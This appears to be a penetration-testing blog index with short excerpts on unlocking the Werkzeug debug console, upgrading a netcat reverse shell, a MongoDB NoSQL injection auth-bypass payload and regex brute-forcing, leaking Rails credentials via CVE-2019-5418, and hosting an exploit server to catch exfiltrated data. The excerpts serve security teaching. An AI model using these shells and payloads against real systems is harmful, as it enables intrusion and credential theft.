Werkzeug Console PIN Exploit

See Werkzeug “console locked” message by forcing debug error page in the app. The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server Locate vulernable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number. You can reverse the algorithm generating the console PIN. Inspect Werkzeug's debug __init__.

Upgrade Default Reverse Shell to Fully Interactive Shell

After reverse shell with netcat listener (e.g. nc -lvp 6969), by default the “dumb shell” is non-interactive and cannot pass special keyboard commands such as tab autocomplete, backspace, arrow keys, etc. To upgrade dumb shell to fully interactive shell, run this python command to get partially interactive shell: python -c 'import pty;pty.spawn("/bin/bash");' <Ctrl-z> in terminal to background netcat. Now with the shell backgrounded, change terminal line settings to type raw and tell it to pass keyboard shortcuts:

Bruteforce MongoDB Credentials with Regex Match Payload

If a login form is vulnerable to NoSQL injection attack, try bypassing authentication with a payload such as: username[$ne]=foo&password[$ne]=foo But explicit login credentials may be required for deeper system access. When this injection vulnerability exists, a regex matching payload could also enumerate the full plaintext password. Here is a Go script to bruteforce admin credentials on a login form that uses MongoDB as a backend. In this example, the script assumes unique HTTP response code of 302 when password regex is matched.

Expose & Decrypt Ruby on Rails credentials.yml.enc

Ruby on Rails is vulnerable to critical information disclosure using the “Accept” header technique (CVE-2019-5418). This can leak the rails app's secret credentials via directory traversal. Expose master key and encrypted credentials First find a path in the Rails app that uses the render file method. Typically a 404 page implements this to render the view. Read more about the root cause of this vulnerability from chybeta. Using Burp Suite Repeater or curl request, test vulnerabilty by setting header value to Accept: .

Serving PoC Exploits with an HTTP Attack Server

Quickly serve your exploit files with Node.js-based http-server by http-party. After testing several different http server scripts, this one fits my use case the best. It's easy to deploy (no installation), activitely maintained on github, and provides live verbose logging of incoming requests. The logging is useful especially when you need to exfiltrate data from the victim. How to deploy On your machine/VPS, cd into the directory containing the file(s) you want to serve.